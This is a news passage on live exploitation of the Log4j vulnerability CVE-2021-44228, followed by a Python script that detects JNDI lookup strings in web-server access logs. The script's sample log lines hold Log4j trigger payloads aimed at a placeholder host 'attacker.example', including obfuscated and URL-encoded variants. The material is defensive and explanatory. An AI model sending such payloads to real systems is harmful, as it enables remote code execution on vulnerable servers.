Miscreants are wasting no time in using the widespread Log4j vulnerability to compromise systems, with waves and waves of live exploit attempts focused mainly – for now – on turning infected devices into cryptocurrency-mining botnet drones.
Israel’s Check Point said this morning it was seeing around 100 exploit attempts every minute, going into further detail in a blog post.
Apache Log4j is a logging utility written in Java that is used all over the world in many software packages and online systems. Last week it emerged that Alibaba security engineer Chen Zhaojun had found and privately disclosed on November 24 details of a trivial-to-exploit remote code execution hole (CVE-2021-44228) in Log4j 2.x, specifically versions 2.14.1 and earlier.
Exploitation is possible by feeding a specially crafted snippet of text, such as a message or username, to an application that logs this information using Log4j 2. If the text contains a particular sequence of characters, the logging utility will end up fetching Java code from an attacker-controlled server and executing it, allowing the machine to be remotely hijacked and controlled. It is easily wormable, and was present in all manner of things, from Steam and Minecraft to Apple’s iCloud.
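The mechanism described above means the malicious input will usually be sitting in plain sight in the logs of the front-end application that received it (a User-Agent header, a query parameter, a username). The following detector is an added example written for this page, not code from the article or from the Log4j project: it scans constructed web-server access-log lines for the `${jndi:` lookup string, after URL-decoding and resolving Log4j's own nested `lower:`, `upper:` and `:-default` lookups so that a trivially re-encoded trigger string is still caught. The log lines, the `attacker.example` hostname and the field layout are all constructed for illustration; the normaliser is a deliberate simplification of Log4j's lookup grammar, sufficient for triage but not a substitute for patching.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: content may not itself contain '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def _resolve(inner: str):
    """Resolve one innermost Log4j lookup the way the logger would.

    Returns None when the lookup is a JNDI lookup, i.e. the thing we are
    hunting for, so it is preserved for the final check. (Simplified
    model of Log4j's lookup grammar; assumption, not the real resolver.)
    """
    low = inner.lower()
    if low.startswith("jndi:"):
        return None
    if low.startswith("lower:"):
        return inner[len("lower:"):].lower()
    if low.startswith("upper:"):
        return inner[len("upper:"):].upper()
    if ":-" in inner:
        # ${name:-default}: an unknown variable falls back to the default text.
        return inner.split(":-", 1)[1]
    # Any other lookup (env:, sys:, date:, ...) resolves to something the
    # sender does not control; for detection purposes treat it as empty.
    return ""


def normalize(text: str) -> str:
    """URL-decode and collapse nested lookups until only JNDI lookups remain."""
    text = unquote(text)  # %24%7B -> ${
    while True:
        changed = False

        def substitute(match):
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)  # keep ${jndi:...} intact
            changed = True
            return resolved

        text = INNER_LOOKUP.sub(substitute, text)
        if not changed:
            return text


def find_jndi_lookups(log_lines):
    """Return 1-based indices of log lines that carry a JNDI lookup string."""
    return [
        n for n, line in enumerate(log_lines, start=1)
        if "${jndi:" in normalize(line).lower()
    ]


# Constructed sample access-log lines (not real traffic); 'attacker.example'
# is a placeholder hostname.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET /login?user=${${lower:j}ndi:ldap://attacker.example/b} HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '203.0.113.11 - - [10/Dec/2021:14:02:17 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.13 - - [10/Dec/2021:14:02:19 +0000] "GET /docs/${project.version} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n in find_jndi_lookups(SAMPLE_ACCESS_LOG):
        print(f"line {n}: JNDI lookup string in logged request data")
```

Run against the constructed sample, lines 2, 3 and 4 are flagged while line 5 (an ordinary `${project.version}` placeholder) is not. A hit in the access log shows that a trigger string reached the application; whether it was actually evaluated depends on whether a Log4j 2.x instance logged that field, so the next step is to check which of the receiving services are on the affected versions and to look for outbound LDAP or HTTP connections from them to hosts they have no business talking to.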